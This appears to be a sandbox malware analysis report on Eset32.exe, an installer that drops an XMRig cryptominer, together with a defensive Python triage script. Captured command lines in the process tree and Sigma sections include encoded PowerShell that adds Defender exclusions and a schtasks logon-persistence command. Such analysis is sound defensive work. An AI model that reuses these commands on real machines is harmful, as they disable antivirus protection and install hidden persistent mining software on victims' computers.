
Windows Analysis Report
Eset32.exe

Overview

General Information

Sample Name:Eset32.exe
Analysis ID:596584
MD5:b405bf6533c047b1a47ceced3b42c23b
SHA1:bbb321d380c3f9d17e49a9f2167234742e292e4d
SHA256:5b35297b640271fea6e846f28d07852589f60ab88ee597c0e2eea68a5de3bec9
Tags:exe

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Writes to foreign memory regions
Found strings related to Crypto-Mining
.NET source code references suspicious native API functions
Encrypted powershell cmdline option found
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
.NET source code contains method to dynamically call methods (often used by packers)
Machine Learning detection for dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Potential dropper URLs found in powershell memory
PE file contains section with special chars
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Drops PE files
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Suspicious Execution of Powershell with Base64
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Process Tree

  • System is w10x64
  • Eset32.exe (PID: 5096 cmdline: "C:\Users\user\Desktop\Eset32.exe" MD5: B405BF6533C047B1A47CECED3B42C23B)
    • 12.exe (PID: 5164 cmdline: C:\Users\user\AppData\Roaming\12.exe MD5: 7ADD9A3AB1734828F756F2725C452C9A)
      • cmd.exe (PID: 5336 cmdline: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 2600 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" MD5: 95000560239032BC68B4C2FDFCDEF913)
        • powershell.exe (PID: 6332 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" MD5: 95000560239032BC68B4C2FDFCDEF913)
      • cmd.exe (PID: 4468 cmdline: cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5720 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • cmd.exe (PID: 5464 cmdline: cmd" cmd /c "C:\Users\user\AppData\Roaming\Windows\System.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • System.exe (PID: 4512 cmdline: C:\Users\user\AppData\Roaming\Windows\System.exe MD5: 7ADD9A3AB1734828F756F2725C452C9A)
          • cmd.exe (PID: 5924 cmdline: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
            • conhost.exe (PID: 4844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • powershell.exe (PID: 5832 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" MD5: 95000560239032BC68B4C2FDFCDEF913)
            • powershell.exe (PID: 6536 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" MD5: 95000560239032BC68B4C2FDFCDEF913)
          • sihost64.exe (PID: 6896 cmdline: "C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe" MD5: E2DD8887AEE175EF9BEFD87B2F6105B3)
    • 1.exe (PID: 6656 cmdline: C:\Users\user\AppData\Roaming\1.exe MD5: D9F92868EEE8D3C8ECD29A7969419D29)
      • conhost.exe (PID: 6684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • AppLaunch.exe (PID: 5716 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
  • System.exe (PID: 3408 cmdline: C:\Users\user\AppData\Roaming\Windows\System.exe MD5: 7ADD9A3AB1734828F756F2725C452C9A)
    • cmd.exe (PID: 4812 cmdline: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6236 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup
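Reading the tree: Eset32.exe is an NSIS installer (the NSIS_Error string further down is the canonical NSIS error URL) that drops 12.exe and 1.exe into %AppData%. 12.exe and System.exe share the same MD5 (7ADD9A3AB1734828F756F2725C452C9A), so System.exe is simply a relocated copy of 12.exe, and the "System" task it registers runs that copy at every logon with the highest run level. The two -EncodedCommand blobs that 12.exe, System.exe and their cmd.exe wrappers launch are base64 of UTF-16LE text; decoded they read `Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force` and `Add-MpPreference -ExclusionExtension @('exe','dll') -Force`, i.e. the dropper excludes the whole user profile, the whole system drive and every .exe and .dll from Defender scanning before the miner is installed. The Python below is an added triage helper written for this page; it is neither the sandbox's nor the sample's code. It decodes -EncodedCommand payloads from a captured command line, flags Defender exclusion tampering, and picks apart the schtasks persistence command. The command lines are copied verbatim from the process tree above; the Defender keyword list and the set of "generic" task names are assumptions chosen for the example.

```python
import base64
import re

# Command lines copied verbatim from the process tree of this report (Analysis ID 596584).
PS_EXCLUSION_PATH = (
    'powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"'
)
PS_EXCLUSION_EXT = (
    'powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="'
)
CMD_CHAIN = f'"cmd" cmd /c {PS_EXCLUSION_PATH} & {PS_EXCLUSION_EXT} & exit'
SCHTASKS_PERSIST = (
    r'schtasks /create /f /sc onlogon /rl highest /tn "System" '
    r'/tr "C:\Users\user\AppData\Roaming\Windows\System.exe"'
)

# powershell.exe accepts any of these spellings for -EncodedCommand.
ENC_FLAG = re.compile(
    r'(?i)(?:^|\s)-(?:encodedcommand|enc|en|ec|e)\s+"?([A-Za-z0-9+/=]+)"?'
)
# Assumed keyword list for Defender tampering (chosen for this example, not from the report).
DEFENDER_TAMPER = (
    "add-mppreference", "set-mppreference", "-exclusionpath",
    "-exclusionextension", "-exclusionprocess", "disablerealtimemonitoring",
)
# Assumed set of task names that impersonate OS components.
GENERIC_TASK_NAMES = {"system", "windows", "update", "microsoft"}
# One schtasks switch plus its optional value; a value never starts with '/'.
SCHTASKS_OPT = re.compile(r'/(\w+)(?:\s+(?!/)("[^"]*"|\S+))?')


def decode_encoded_commands(cmdline):
    """Return the plaintext of every -EncodedCommand blob in a command line.

    powershell.exe expects base64 of UTF-16LE text. A blob that does not
    round-trip is reported as None so the caller still sees the flag was used.
    """
    decoded = []
    for blob in ENC_FLAG.findall(cmdline):
        blob += "=" * (-len(blob) % 4)           # tolerate stripped padding
        try:
            decoded.append(base64.b64decode(blob).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            decoded.append(None)
    return decoded


def is_defender_tampering(script):
    """True if a decoded PowerShell script touches Defender preferences."""
    s = script.lower()
    return any(k in s for k in DEFENDER_TAMPER)


def triage_schtasks(cmdline):
    """Parse `schtasks /create` switches and list the persistence traits seen in this report."""
    if not re.search(r'(?i)\bschtasks(?:\.exe)?\b.*?/create\b', cmdline):
        return None
    opts = {k.lower(): v.strip('"') for k, v in SCHTASKS_OPT.findall(cmdline)}
    reasons = []
    if opts.get("sc", "").lower() == "onlogon":
        reasons.append("triggers at every logon")
    if opts.get("rl", "").lower() == "highest":
        reasons.append("requests highest run level")
    if re.search(r'(?i)\\appdata\\', opts.get("tr", "")):
        reasons.append("task action lives under the user's AppData")
    if opts.get("tn", "").lower() in GENERIC_TASK_NAMES:
        reasons.append("task name mimics a system component")
    if "f" in opts:
        reasons.append("/f silently overwrites an existing task of that name")
    return {"task_name": opts.get("tn"), "action": opts.get("tr"), "reasons": reasons}


def analyze(cmdline):
    """One-shot triage: decoded PowerShell, Defender-tampering verdict, task traits."""
    decoded = decode_encoded_commands(cmdline)
    return {
        "decoded_powershell": decoded,
        "defender_tampering": any(d is not None and is_defender_tampering(d) for d in decoded),
        "schtasks": triage_schtasks(cmdline),
    }


if __name__ == "__main__":
    for line in (CMD_CHAIN, SCHTASKS_PERSIST):
        print(analyze(line))
```

Running it over the two chains prints the decoded Add-MpPreference calls with `defender_tampering: True`, and for the schtasks line lists every trait above. The decoder deliberately reports a blob that is not valid UTF-16LE as None rather than dropping it: in triage, knowing that -EncodedCommand was used matters even when the payload is garbage.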
Malware Configuration

No configs have been found
Yara Overview

Memory dumps and process memory:
Source: 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp | Rule: CoinMiner_Strings | Description: Detects mining pool protocol string in Executable | Author: Florian Roth
  • 0x1c7e8:$sa1: stratum+tcp://
Source: 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
Source: 0000001A.00000002.701782612.0000000018691000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
Source: Process Memory Space: System.exe PID: 4512 | Rule: CoinMiner_Strings | Description: Detects mining pool protocol string in Executable | Author: Florian Roth
  • 0x3cda8:$sa1: stratum+tcp://
  • 0x40b9b:$sa1: stratum+tcp://
  • 0x17c640:$sa1: stratum+tcp://
  • 0x180425:$sa1: stratum+tcp://
Source: Process Memory Space: System.exe PID: 4512 | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security

Unpacked PE files:
Source: 26.2.System.exe.18691d78.9.raw.unpack | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security
Source: 26.2.System.exe.18691d78.9.unpack | Rule: JoeSecurity_Xmrig | Description: Yara detected Xmrig cryptocurrency miner | Author: Joe Security


Sigma Overview

Source: DNS query | Author: Brandon George (blog post), Thomas Patzke (rule) | Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, QueryName: ip-api.com
Source: Process started | Author: frack113 | Data: Command: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , CommandLine: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5336, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , ProcessId: 2600, ProcessName: powershell.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\Desktop\Eset32.exe, ProcessId: 5096, TargetFilename: C:\Users\user\AppData\Roaming\12.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , CommandLine: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5336, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , ProcessId: 2600, ProcessName: powershell.exe
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132926585861677999.2600.DefaultAppDomain.powershell

            AV Detection

Source: Eset32.exe | Virustotal: Detection: 63%
Source: Eset32.exe | Metadefender: Detection: 14%
Source: Eset32.exe | ReversingLabs: Detection: 59%
Source: Eset32.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe | Avira: detection malicious, Label: HEUR/AGEN.1235806
Source: C:\Users\user\AppData\Roaming\1.exe | Virustotal: Detection: 37%
Source: C:\Users\user\AppData\Roaming\1.exe | ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Roaming\12.exe | Virustotal: Detection: 60%
Source: C:\Users\user\AppData\Roaming\12.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\Windows\System.exe | Virustotal: Detection: 60%
Source: C:\Users\user\AppData\Roaming\Windows\System.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe | Virustotal: Detection: 29%
Source: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe | ReversingLabs: Detection: 73%
Source: Eset32.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\1.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\12.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Windows\System.exe | Joe Sandbox ML: detected

            Bitcoin Miner

Source: Yara match | File source: 26.2.System.exe.18691d78.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.System.exe.18691d78.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.701782612.0000000018691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: System.exe PID: 4512, type: MEMORYSTR
Source: System.exe, 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: stratum+tcp://-:x@exit:0
Source: Eset32.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Eset32.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb | source: 1.exe, 00000004.00000003.433262708.0000000002612000.00000040.00001000.00020000.00000000.sdmp, 1.exe, 00000004.00000002.433791167.0000000000114000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 00000006.00000002.705990964.0000000000402000.00000020.00000400.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Eset32.exe | Code function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
Source: C:\Users\user\Desktop\Eset32.exe | Code function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
Source: C:\Users\user\Desktop\Eset32.exe | Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,SHELL32_IconCache_DoneExtractingIcons,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF

            Networking

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | DNS query: name: ip-api.com
Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
Source: powershell.exe, 0000001E.00000002.625526562.0000024F8D88F000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuerymati
Source: powershell.exe, 00000021.00000002.681492895.000002BE88B10000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive

Note on the ip-api.com request: it is the only outbound HTTP traffic in the run and asks the service solely for its hosting field, which reports whether the caller's public IP belongs to a hosting, colocation or data-center range. That answer is a cheap proxy for "am I in a cloud VM or sandbox rather than on a victim desktop", and it sits alongside the WMI Win32_VideoController and Win32_Processor queries in the signature list for the same reason. The request is issued from AppLaunch.exe, the Microsoft .NET host that 1.exe spawns; the DotNetZip.pdb path that shows up in AppLaunch.exe's image region is consistent with the process-injection signatures above (suspended-mode process creation, foreign memory writes, PE injection). The cmdlets-over-objects, Pester, NuGet and contoso.com strings in the powershell.exe dumps are ordinary PowerShell runtime residue, not indicators.
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
